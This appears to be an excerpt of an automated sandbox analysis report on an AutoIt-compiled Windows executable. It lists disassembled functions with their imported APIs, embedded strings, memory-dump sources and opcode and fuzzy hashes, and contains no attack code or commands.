                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                    • API String ID: 1993697042-4164748364
                                                                                                                    • Opcode ID: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                                                                    • Instruction ID: a6707473a89b188089c3422cc9ec380ce2166dc35f2205b0a941c3ff78dd3e98
                                                                                                                    • Opcode Fuzzy Hash: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                                                                    • Instruction Fuzzy Hash: F9529332A08A4695EB14AF2DD4546B9A760FFA6B84F901136DF4D47AB8CF38F460C790
                                                                                                                    Function 00007FF7BB88CE8C Relevance: 69.5, APIs: 46, Instructions: 540windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3481653762-0
                                                                                                                    • Opcode ID: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                                                                    • Instruction ID: 732328d4690ace39a8fc3be4bdbee066809d92432798f591e9ae80548592a057
                                                                                                                    • Opcode Fuzzy Hash: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                                                                    • Instruction Fuzzy Hash: E732A036A0868187EB50EF2DD8586A9B7A1FB96B84F901135DF4E43B68CF3CE451C760
                                                                                                                    Function 00007FF7BB88BA0C Relevance: 54.8, APIs: 30, Strings: 1, Instructions: 500windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                    • API String ID: 1218376639-328681919
                                                                                                                    • Opcode ID: 15cb830b0cc23734fd2b6974997ae53d3376534da490689092daee552fdb8ad3
                                                                                                                    • Instruction ID: 576a20370a3a4c3a0878c337ee06feecad68a2795475ce1c0de57c2515ed28a2
                                                                                                                    • Opcode Fuzzy Hash: 15cb830b0cc23734fd2b6974997ae53d3376534da490689092daee552fdb8ad3
                                                                                                                    • Instruction Fuzzy Hash: CF12B132A0964287FB50AB2DD8586BDA3A0FF96B94F805135DF5947BF8CE3CE4118B50
                                                                                                                    Function 00007FF7BB88DB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 1208186926-3110715001
                                                                                                                    • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                                    • Instruction ID: cb95513fcb1f4c344697e0e8ec881ffafa34a0f72fc93a52d41f1fa16a0a580a
                                                                                                                    • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                                    • Instruction Fuzzy Hash: 17125872A0864287F7249B2DD8587BDA7A1FB56794F804539DF4D07AA8CF3CE460C7A0
                                                                                                                    Function 00007FF7BB8732AC Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 327windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-2439800395
                                                                                                                    • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                                    • Instruction ID: e58310c72799977a1adfe7af0bdf49c5728b5154b4613513c49430b080074714
                                                                                                                    • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                                    • Instruction Fuzzy Hash: CEE180366087418AE714EF6DE8446A9B7A0FB9AB88F901135DF4E43B78CF7CE0548B50
                                                                                                                    Function 00007FF7BB804514 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 3778422247-2988720461
                                                                                                                    • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                                    • Instruction ID: e694818fac9bdda0496200fb735e566b122f0d18b2e9182a65f16e5412fbe7dc
                                                                                                                    • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                                    • Instruction Fuzzy Hash: A341AC11B0871287EB146B3EE81C679A291BF9AB84FC45031CE4A47B78DF3DB8598390
                                                                                                                    Function 00007FF7BB7E183C Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3372153169-0
                                                                                                                    • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                                    • Instruction ID: 24b9250115667aca634079377273ac15494859911ad67ecc345c035828803339
                                                                                                                    • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                                    • Instruction Fuzzy Hash: A422D231A0868685EB64AB6CC4542BDA361FF66B94FD44136CF5E47AB8CF3CE450C3A0
                                                                                                                    Function 00007FF7BB84CE68 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                                                                    • String ID: default$winsta0$winsta0\default
                                                                                                                    • API String ID: 3202303201-1423368268
                                                                                                                    • Opcode ID: b851efc49dd96de22d536d39b557776f26f823acd89a792731e82083e82be55f
                                                                                                                    • Instruction ID: fba5f30928d91fd89d9ef334310be2a878d1ecbc51ea63cf24f8d89742e22e7c
                                                                                                                    • Opcode Fuzzy Hash: b851efc49dd96de22d536d39b557776f26f823acd89a792731e82083e82be55f
                                                                                                                    • Instruction Fuzzy Hash: 5FA16232A08B418AEB10EF6DE4546A9A3A1FB56B94F840135DF5D47BACCF3CE415C790
                                                                                                                    Function 00007FF7BB7E2AE0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                    • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                                                    • Instruction ID: fe12d0328d78bbf2cfc12ca37d8f6c3e856a49d041b5e69d6aa144e022f6c4b5
                                                                                                                    • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                                                    • Instruction Fuzzy Hash: 18D16F32A04A468AEB14EF7CD8546AC77A1FB59B58F90013ADF0E436B8DF38A454C790
                                                                                                                    Function 00007FF7BB80F8D0 Relevance: 31.9, APIs: 20, Instructions: 1857COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2880407647-0
                                                                                                                    • Opcode ID: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                                                                    • Instruction ID: 59f1963e587f976ded15e1f73a060911083bdfebb7c545ec403326de9b8db79c
                                                                                                                    • Opcode Fuzzy Hash: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                                                                    • Instruction Fuzzy Hash: 2C03D672A091C28FD7759E1D9840BF9B7A5FBA978CF800135DF0957B6CDB38A9108B90
                                                                                                                    Function 00007FF7BB870A6C Relevance: 30.2, APIs: 20, Instructions: 169clipboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3222323430-0
                                                                                                                    • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                                                    • Instruction ID: f09842b3164db963cf1eca4c3d7af06cb15e6281352c9bce0a741e86955bebb5
                                                                                                                    • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                                                    • Instruction Fuzzy Hash: 8E716321A0964286EE10BB6ED4582BCA351BFA6B44FC04036DF4E477B9DF3CE65583A4
                                                                                                                    Function 00007FF7BB87206C Relevance: 27.1, APIs: 18, Instructions: 125COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215588206-0
                                                                                                                    • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                                    • Instruction ID: 938d214b673ade35fffb745c531a7430cc7c82f7a5b055f7d924b9f2e49539a2
                                                                                                                    • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                                    • Instruction Fuzzy Hash: 8E515E32A0CB028AEB44AF7CE45817D63A1FB5A744F904439DF4E837A8DE7DE4658394
                                                                                                                    Function 00007FF7BB82529C Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 281475176-2761157908
                                                                                                                    • Opcode ID: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                                                                    • Instruction ID: 03e230b4e238425a1466e76e19fc654d03a724a7caca532edb7fc9d3583fbb25
                                                                                                                    • Opcode Fuzzy Hash: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                                                                    • Instruction Fuzzy Hash: 03B22972A081828BE725AE2DD4407FDB7A1FBA5388F905135DF0957BACDF38E5148B90
                                                                                                                    Function 00007FF7BB880AEC Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 388registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseValue$ConnectCreateRegistry
                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                    • API String ID: 3314541760-966354055
                                                                                                                    • Opcode ID: 471c7e3c3fe8a2b70033303248d94f7d162831eddfad09d83073793ff2f339db
                                                                                                                    • Instruction ID: d112ff902f031dc44dcf8fcbc107bf1bde4b02ddf799e5d84842dca690e26c95
                                                                                                                    • Opcode Fuzzy Hash: 471c7e3c3fe8a2b70033303248d94f7d162831eddfad09d83073793ff2f339db
                                                                                                                    • Instruction Fuzzy Hash: D7028422B08A4285EB10EF6DD4515ADB764FFAAB84B849032DF4D4777ADF38E451C3A0
                                                                                                                    Function 00007FF7BB7E5F3C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 0-3110715001
                                                                                                                    • Opcode ID: 088bba3a1016d805068b1795b2da5f6ed91fd4b1a7bbf8d4e2293c13cc0fe4ac
                                                                                                                    • Instruction ID: 0696270ca658d82467ea6bb5fc9ce56865b7d24233b1094cfe8fa7b77b89ff75
                                                                                                                    • Opcode Fuzzy Hash: 088bba3a1016d805068b1795b2da5f6ed91fd4b1a7bbf8d4e2293c13cc0fe4ac
                                                                                                                    • Instruction Fuzzy Hash: 5DA1B132A0864186E724EF2DD4542BAB760FFA6784F904136DF4E07AA8CF7CE555CB50
                                                                                                                    Function 00007FF7BB822400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                    • String ID: -$:$:$?
                                                                                                                    • API String ID: 3440502458-92861585
                                                                                                                    • Opcode ID: 59dcdab51f47b0a634fd4a16188f26c8f2a6bc9bd1c56be720e7c676ed12fe7f
                                                                                                                    • Instruction ID: 52142e0aef05e00f0192350e386ad702fc1f4799f7c0e02c1329351c9a951aa2
